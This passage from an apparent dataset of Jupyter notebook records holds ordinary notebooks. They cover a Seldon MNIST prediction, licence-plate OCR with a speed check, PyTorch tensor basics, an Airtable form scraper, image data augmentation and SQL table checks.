}\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.5215686559677124\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.2039215862751007\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.2392157018184662\n }\n values {\n number_value: 0.9490196704864502\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.2039215862751007\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.4745098352432251\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.8588235974311829\n }\n values {\n number_value: 0.1568627506494522\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.4745098352432251\n }\n values {\n number_value: 0.9960784912109375\n }\n values {\n number_value: 0.8117647767066956\n }\n values {\n number_value: 0.07058823853731155\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n values {\n number_value: 0.0\n }\n }\n }\n }\n}\n\nResponse:\nmeta {\n puid: \"l6bv1r38mmb32l0hbinln2jjcl\"\n requestPath {\n key: \"classifier\"\n value: \"271049282727.dkr.ecr.us-west-2.amazonaws.com/seldon-repository:latest\"\n }\n}\ndata {\n names: \"class:0\"\n names: \"class:1\"\n names: \"class:2\"\n names: \"class:3\"\n names: \"class:4\"\n names: \"class:5\"\n names: \"class:6\"\n names: \"class:7\"\n names: \"class:8\"\n names: \"class:9\"\n ndarray {\n values {\n list_value {\n values {\n number_value: 6.839015986770391e-05\n }\n values {\n number_value: 9.376968534979824e-09\n }\n values {\n number_value: 8.48581112222746e-05\n }\n values {\n number_value: 0.0034086888190358877\n }\n values {\n number_value: 2.3978568606253248e-06\n }\n values {\n number_value: 2.0100669644307345e-05\n }\n values {\n number_value: 3.0251623428512175e-08\n }\n values {\n number_value: 0.9953710436820984\n }\n values {\n number_value: 2.6070511012221687e-05\n }\n values {\n number_value: 0.0010185304563492537\n }\n }\n }\n }\n}\n\n"
]
],
[
[
"### Let's visualise the probability for each label\nIt seems that it correctly predicted the number 7",
"_____no_output_____"
]
],
[
[
"for proba, label in zip(client_prediction.response.data.ndarray.values[0].list_value.ListFields()[0][1], range(0,10)):\n print(f\"LABEL {label}:\\t {proba.number_value*100:6.4f} %\")",
"LABEL 0:\t 0.0068 %\nLABEL 1:\t 0.0000 %\nLABEL 2:\t 0.0085 %\nLABEL 3:\t 0.3409 %\nLABEL 4:\t 0.0002 %\nLABEL 5:\t 0.0020 %\nLABEL 6:\t 0.0000 %\nLABEL 7:\t 99.5371 %\nLABEL 8:\t 0.0026 %\nLABEL 9:\t 0.1019 %\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb50d9419bfd1604739e44bf04182173503828ec | 237,161 | ipynb | Jupyter Notebook | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Second_Detection-checkpoint.ipynb | RithvikRS/Road-Safety | 979ecad68c2f227a3caaf23f47d4f196a970d623 | [
"MIT"
] | null | null | null | 658.780556 | 129,920 | 0.95186 | [
[
[
"#importing libraries\nimport cv2\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport imutils\nimport easyocr\nfrom datetime import datetime\nimport mysql.connector\nfrom csv import writer",
"_____no_output_____"
],
[
"#importing image and converting into grayscale\nimg = cv2.imread('image3.jpg')\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\nplt.imshow(gray)",
"_____no_output_____"
],
[
"#Decting Edge\nbfilter = cv2.bilateralFilter(gray, 11, 17, 17) #Noise reduction\nedged = cv2.Canny(bfilter, 30, 200) #Edge detection\nplt.imshow(edged)",
"_____no_output_____"
],
[
"#Finding Contours\nkeypoints = cv2.findContours(edged.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\ncontours = imutils.grab_contours(keypoints)\ncontours = sorted(contours, key=cv2.contourArea, reverse=True)[:10]\n\nlocation = None\nfor contour in contours:\n approx = cv2.approxPolyDP(contour, 10, True)\n if len(approx) == 4:\n location = approx\n break\n \nlocation",
"_____no_output_____"
],
[
"#Finding the location\nmask = np.zeros(gray.shape, np.uint8)\nnew_image = cv2.drawContours(mask, [location], 0,255, -1)\nnew_image = cv2.bitwise_and(img, img, mask=mask)\nplt.imshow(cv2.cvtColor(new_image, cv2.COLOR_BGR2RGB))",
"_____no_output_____"
],
[
"#Cropping the image and turning into grayscale\n(x,y) = np.where(mask==255)\n(x1, y1) = (np.min(x), np.min(y))\n(x2, y2) = (np.max(x), np.max(y))\ncropped_image = gray[x1:x2+1, y1:y2+1]\nplt.imshow(cv2.cvtColor(cropped_image, cv2.COLOR_BGR2RGB))",
"_____no_output_____"
],
[
"#Using OCR\nreader = easyocr.Reader(['en'])\nresult = reader.readtext(cropped_image)\nresult",
"_____no_output_____"
],
[
"#Results\ntext2=\"\"\nif len(result)>1:\n text = result[0][-2]+\" \"+result[1][-2]\nelse:\n text = result[0][-2]\nfor i in text:\n if i==\",\" or i==\".\" or i.isspace():\n i=\"\"\n text2+=i\ntext2 = text2.upper()\nprint(text2)",
"PL8REC\n"
],
[
"#Searching in database\ndb2 = mysql.connector.connect(host=\"localhost\",user=\"root\",passwd=\"root\",database=\"iip\")\nmycursor2 = db2.cursor()\nmycursor2.execute(\"SELECT numberplate, time FROM vehicle WHERE numberplate = %s\",(text2,))\nmyresult = mycursor2.fetchall()\nrow_count = mycursor2.rowcount\nprint (\"number of affected rows: {}\".format(row_count))\nif row_count == 0:\n print (\"It Does Not Exist\")\nelse:\n tme=myresult[0][1]\n date_from_sql = tme.strftime('%H:%M:%S')\n date_from_sql = datetime.strptime(date_from_sql, '%H:%M:%S')\n now = datetime.now()\n formatted_date = now.strftime('%H:%M:%S')\n formatted_date = datetime.strptime(formatted_date, '%H:%M:%S')\n delta = formatted_date - date_from_sql\n diff=delta.seconds\n print(diff)",
"number of affected rows: 1\n8\n"
],
[
"#Adding to CSV file\nmax_speed = 30 #in Km/h\ndistance = 1 #in Km\navg_spd = distance/(diff/3600)\nprint(avg_spd)\nif(max_speed < avg_spd):\n print(\"The average speed of car is higher than max speed\")\n ls = [myresult[0][0], avg_spd]\n with open('car.csv', 'a') as f_object:\n writer_object = writer(f_object)\n writer_object.writerow(ls)\n f_object.close()\n ",
"450.0\nThe average speed of car is higher than max speed\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb50ded82afb67e32bed72777db8775d3df91ceb | 30,654 | ipynb | Jupyter Notebook | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | PyTorch/.ipynb_checkpoints/Matrizes_Arrays_Tensores-checkpoint.ipynb | vcasadei/deep-learning-facens-2018 | 7ea283bf33085c13ba01825022cf03e9922f06ec | [
"MIT"
] | null | null | null | 20.938525 | 329 | 0.467247 | [
[
[
"# Matrizes, Arrays, Tensores",
"_____no_output_____"
],
[
"## Referências",
"_____no_output_____"
],
[
"- Documentação oficial de Tensores do PyTorch\n http://pytorch.org/docs/master/tensors.html\n- PyTorch para usuários NumPy:\n https://github.com/torch/torch7/wiki/Torch-for-Numpy-users",
"_____no_output_____"
],
[
"## NumPy array",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"a = np.array([[2., 8., 3.],\n [0.,-1., 5.]])\na",
"_____no_output_____"
],
[
"a.shape",
"_____no_output_____"
],
[
"a.dtype",
"_____no_output_____"
]
],
[
[
"## PyTorch tensor",
"_____no_output_____"
],
[
"Os tensores do PyTorch só podem ser float, float32 ou float64",
"_____no_output_____"
]
],
[
[
"import torch",
"_____no_output_____"
]
],
[
[
"### Convertendo NumPy array para tensor PyTorch",
"_____no_output_____"
]
],
[
[
"b = torch.Tensor(np.zeros((3,4)))\nb",
"_____no_output_____"
]
],
[
[
"### Criando arrays e tensores constantes",
"_____no_output_____"
]
],
[
[
"c = np.ones((2,4)); c",
"_____no_output_____"
],
[
"d = torch.ones((2,4)); d",
"_____no_output_____"
]
],
[
[
"### Criando arrays e tensores aleatórios",
"_____no_output_____"
]
],
[
[
"e = np.random.rand(2,4); e",
"_____no_output_____"
],
[
"f = torch.rand(2,4); f",
"_____no_output_____"
]
],
[
[
"### Arrays aleatórios com semente, para reproduzir mesma sequência pseudoaleatória",
"_____no_output_____"
]
],
[
[
"np.random.seed(1234)\ne = np.random.rand(2,4);e",
"_____no_output_____"
],
[
"torch.manual_seed(1234)\nf = torch.rand(2,4); f",
"_____no_output_____"
]
],
[
[
"### Torch seed is different for GPU",
"_____no_output_____"
]
],
[
[
"if torch.cuda.is_available():\n torch.cuda.torch.manual_seed(1234)\n g = torch.cuda.torch.rand(2,4)\n print(g)",
"\n 0.0290 0.4019 0.2598 0.3666\n 0.0583 0.7006 0.0518 0.4681\n[torch.FloatTensor of size 2x4]\n\n"
]
],
[
[
"## Conversões entre NumPy e Tensores PyTorch",
"_____no_output_____"
],
[
"### NumPy para Tensor PyTorch utilizando `.from_numpy()` - CUIDADO",
"_____no_output_____"
],
[
"Não são todos os tipos de elementos do array NumPy que podem ser convertidos \npara tensores PyTorch. Abaixo é um programa que cria uma tabela de equivalencias\nentre os tipos do NumPy e os tipos do Tensor PyTorch:",
"_____no_output_____"
]
],
[
[
"import pandas as pd \ndtypes = [np.uint8, np.int32, np.int64, np.float32, np.float64, np.double]\ntable = np.empty((2, len(dtypes)),dtype=np.object)\nfor i,t in enumerate(dtypes):\n a = np.array([1],dtype=t)\n ta = torch.from_numpy(a)\n table[0,i] = a.dtype.name\n table[1,i] = type(ta).__name__\npd.DataFrame(table)",
"_____no_output_____"
]
],
[
[
"### NumPy para Tensor utilizando `torch.FloatTensor()` - método recomendado",
"_____no_output_____"
],
[
"Existe uma cuidado importante a ser tomado na transformação de matrizes do NumPy para tensores PyTorch pois as funções de rede neurais do PyTorch utilizam o tipo FloatTensor e o NumPy utiliza como default o tipo float64, o que faz uma conversão automática para DoubleTensor do PyTorch e consequentemente gerando um erro.\nA recomendação é utilizar o `torch.FloatTensor` para converter NumPy para tensores PyTorch:",
"_____no_output_____"
]
],
[
[
"a = np.ones((2,5))\na_t = torch.FloatTensor(a)\na_t",
"_____no_output_____"
]
],
[
[
"### Tensor PyTorch para array NumPy",
"_____no_output_____"
]
],
[
[
"ta = torch.ones(2,3)\nta",
"_____no_output_____"
],
[
"a = ta.numpy()\na",
"_____no_output_____"
]
],
[
[
"## Tensor na CPU e na GPU",
"_____no_output_____"
]
],
[
[
"ta_cpu = torch.ones(2,3); ta_cpu",
"_____no_output_____"
],
[
"if torch.cuda.is_available():\n ta_gpu = ta_cpu.cuda()\n print(ta_gpu)",
"\n 1 1 1\n 1 1 1\n[torch.cuda.FloatTensor of size 2x3 (GPU 0)]\n\n"
]
],
[
[
"## Operações em tensores",
"_____no_output_____"
],
[
"### criação de tensor e visualização do seu shape",
"_____no_output_____"
]
],
[
[
"a = torch.eye(4); a",
"_____no_output_____"
],
[
"a.size()",
"_____no_output_____"
]
],
[
[
"### Reshape é feito com `view` em PyTorch",
"_____no_output_____"
]
],
[
[
"b = a.view(2,8); b",
"_____no_output_____"
]
],
[
[
"Aqui é um exemplo criando um tensor unidimensional sequencial de 0 a 23 e em seguida uma reshape para\nque o tensor fique com 4 linhas e 6 colunas",
"_____no_output_____"
]
],
[
[
"a = torch.arange(0,24).view(4,6);a",
"_____no_output_____"
]
],
[
[
"### Adição elemento por elemento",
"_____no_output_____"
],
[
"#### usando operadores",
"_____no_output_____"
]
],
[
[
"c = a + a; c",
"_____no_output_____"
],
[
"d = a - c ; d",
"_____no_output_____"
]
],
[
[
"#### forma funcional",
"_____no_output_____"
]
],
[
[
"d = a.sub(c); d",
"_____no_output_____"
]
],
[
[
"#### Operação in-place",
"_____no_output_____"
]
],
[
[
"a.sub_(c); a",
"_____no_output_____"
]
],
[
[
"### Multiplicação elemento por elemento",
"_____no_output_____"
]
],
[
[
"d = a * c; d ",
"_____no_output_____"
],
[
"d = a.mul(c); d",
"_____no_output_____"
],
[
"a.mul_(c); a",
"_____no_output_____"
]
],
[
[
"### Média em tensores",
"_____no_output_____"
]
],
[
[
"a = torch.arange(0,24).view(4,6); a",
"_____no_output_____"
],
[
"u = a.mean(); u",
"_____no_output_____"
],
[
"uu = a.sum()/a.nelement(); uu",
"_____no_output_____"
]
],
[
[
"### Média com redução de eixo ",
"_____no_output_____"
]
],
[
[
"u_row = a.mean(dim=1); u_row",
"_____no_output_____"
],
[
"u_col = a.mean(dim=0); u_col",
"_____no_output_____"
]
],
[
[
"### Desvio padrão",
"_____no_output_____"
]
],
[
[
"std = a.std(); std",
"_____no_output_____"
],
[
"std_row = a.std(dim=1); std_row",
"_____no_output_____"
]
],
[
[
"## Comparação speedup CPU e GPU",
"_____no_output_____"
]
],
[
[
"a_numpy_cpu = np.ones((1000,1000))\n%timeit b = 2 * a_numpy_cpu\na_torch_cpu = torch.ones(1000,1000)\n%timeit b = 2 * a_torch_cpu",
"1.36 ms ± 102 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n441 µs ± 1.11 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n"
],
[
"if torch.cuda.is_available():\n a_torch_gpu = a_torch_cpu.cuda()\n %timeit b = 2 * a_torch_gpu",
"41.7 µs ± 41.8 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n"
]
],
[
[
"Rodando o código abaixo na GTX1080: speedup de 15,5\n- 888 µs ± 43.4 ns per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n- 57.1 µs ± 22.7 ns per loop (mean ± std. dev. of 7 runs, 10000 loops each)\nRodando no macbook:\n- numpy: 1000 loops, best of 3: 449 µs per loop\n- torch: 1000 loops, best of 3: 1.6 ms per loop",
"_____no_output_____"
]
],
[
[
"%timeit b1 = a_numpy_cpu.mean()\n%timeit b2 = a_torch_cpu.mean()\nif torch.cuda.is_available():\n %timeit c = a_torch_gpu.mean()",
"433 µs ± 9.54 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n792 µs ± 11.6 µs per loop (mean ± std. dev. of 7 runs, 1000 loops each)\n80.7 µs ± 1.82 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb50e50db08cbc3b63077d8a49098754d5d5ff9a | 3,633 | ipynb | Jupyter Notebook | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb | cscampana/Apache-Maven-Beginner-to-Guru | eec370b5bda5d4ba7406888b1283bcd4256ca144 | [
"MIT"
] | null | null | null | 29.064 | 319 | 0.536746 | [
[
[
"<a href=\"https://colab.research.google.com/github/cscampana/Apache-Maven-Beginner-to-Guru/blob/master/Using_BeautifulSoup_with_Selenium_to_extract_single_selects_content_from_Airtable.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# Using BeautifulSoup with Selenium to extract single selects content from Airtable\n\nWe use Selenium with BeautifulSoup to extract all items in single selects within an Airtable form and print them in the console.\n\nThe element class is flex-auto truncate-pre for all single selects.\n",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport requests\nimport sys",
"_____no_output_____"
],
[
"#Dependency install\n%%capture\n!pip install selenium\n!apt-get update # to update ubuntu to correctly run apt install\n!apt install chromium-chromedriver\n!cp /usr/lib/chromium-browser/chromedriver /usr/bin\nsys.path.insert(0,'/usr/lib/chromium-browser/chromedriver')\n\n\nfrom selenium import webdriver\n\n# Chrome configuration\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--no-sandbox')\nchrome_options.add_argument('--disable-dev-shm-usage')\n\n# Selenium request\nwd = webdriver.Chrome('chromedriver',chrome_options=chrome_options)",
"_____no_output_____"
]
],
[
[
"Input the complete URL of the form in the following box:",
"_____no_output_____"
]
],
[
[
"url = input(\"Complete url of the form: \")",
"_____no_output_____"
],
[
"# Url content retrieve and parser.\n\nwd.get(url)\nhtml = wd.page_source\nsoup = BeautifulSoup(html, 'html.parser')\ncolleges = soup.find_all(class_=\"flex-auto truncate-pre\", text=True)\n# Output\nfor div in colleges:\n print(div.text)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb50eacf0e8112a4ed6f88b65d535e22526c6d65 | 975,277 | ipynb | Jupyter Notebook | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | 1 | 2021-05-15T13:35:52.000Z | 2021-05-15T13:35:52.000Z | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | null | null | null | Data Augmentation.ipynb | adfoucart/dlia-videos | 75c9e6108ade3a953bc0d10afbb7a3a0ebb51b16 | [
"MIT"
] | null | null | null | 3,229.39404 | 247,020 | 0.965063 | [
[
[
"from DataGenerator import DataGenerator\n%pylab inline",
"Populating the interactive namespace from numpy and matplotlib\n"
],
[
"dg = DataGenerator(5, 10, \"d:/Adrien/dataset/GlaS/train\")",
"_____no_output_____"
],
[
"j = 0\nfor batch_x,batch_y in dg.next_batch(1):\n print(batch_x.min(),batch_x.max())\n for i in range(1):\n plt.figure()\n plt.imshow(batch_x[i])\n plt.contour(batch_y[i])\n plt.show()\n j += 1\n if j > 3:\n break",
"0.0 1.0000110234735244\n"
],
[
"batch_x,batch_y = DataGenerator._DataGenerator__augment(batch_x, batch_y)",
"_____no_output_____"
],
[
"print(batch_y.max())\nfor i in range(5):\n plt.figure()\n plt.imshow(batch_x[i]+.5)\n plt.contour(batch_y[i])\n plt.show()",
"_____no_output_____"
],
[
"im = dg.images[dg.train_idxs[0]]\nanno = dg.annotations[dg.train_idxs[0]]",
"_____no_output_____"
],
[
"plt.figure()\nplt.imshow(im)\nplt.contour(anno)\nplt.show()",
"_____no_output_____"
],
[
"# Vertical flip:\nim2 = im[::-1,:,:]\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"# Horizontal flip\nim2 = im[:,::-1,:]\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"# Random noise\nim2 = np.clip(im + np.random.normal(0, 0.1, size=im.shape),0,1)\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"from skimage.transform import rotate\nim2 = rotate(im, angle=int(np.random.random()*360))\nplt.figure()\nplt.imshow(im2)\nplt.show()",
"_____no_output_____"
],
[
"print(((np.random.random()<0.5)-0.5)*2)",
"_____no_output_____"
],
[
"def augment(x, y):\n # apply to x & y\n flip_h = int(((np.random.random()<0.5)-0.5)*2)\n flip_v = int(((np.random.random()<0.5)-0.5)*2)\n rotation = int(np.random.random()*360)\n \n # apply to x only\n noise = np.random.normal(0, 0.1, size=x.shape)\n \n x = np.clip(rotate(x[::flip_v,::flip_h]+noise, angle=rotation), 0, 1)\n y = rotate(y[::flip_v,::flip_h], angle=rotation)\n return x,y",
"_____no_output_____"
],
[
"x2,y2 = augment(im, anno)\nplt.figure()\nplt.imshow(x2)\nplt.contour(y2)\nplt.show()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb50f5eab7d4c0c799b82ab9369b14cfc5275eb4 | 15,855 | ipynb | Jupyter Notebook | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | test.ipynb | thepembeweb/data-modeling-with-postgres | cfdf87340993b5f39e50bd2c7c6a70bab30609cd | [
"MIT"
] | null | null | null | 30.846304 | 307 | 0.408515 | [
[
[
"%load_ext sql",
"_____no_output_____"
],
[
"%sql postgresql://student:[email protected]/sparkifydb",
"_____no_output_____"
],
[
"%sql SELECT * FROM songplays LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM users LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM songs LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM artists LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
],
[
"%sql SELECT * FROM time LIMIT 5;",
" * postgresql://student:***@127.0.0.1/sparkifydb\n5 rows affected.\n"
]
],
[
[
"## REMEMBER: Restart this notebook to close connection to `sparkifydb`\nEach time you run the cells above, remember to restart this notebook to close the connection to your database. Otherwise, you won't be able to run your code in `create_tables.py`, `etl.py`, or `etl.ipynb` files since you can't make multiple connections to the same database (in this case, sparkifydb).",
"_____no_output_____"
]
]
] | [
"code",
"markdown"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb50fe050f967fb36cb1ecf8f7ce9734ca4e92fa | 173,032 | ipynb | Jupyter Notebook | examples/natural_language/sentiment_analysis/custom_sentences.ipynb | jumelet/path_explain | c0663522379b4864628962dc43daf78d826e9470 | [
"MIT"
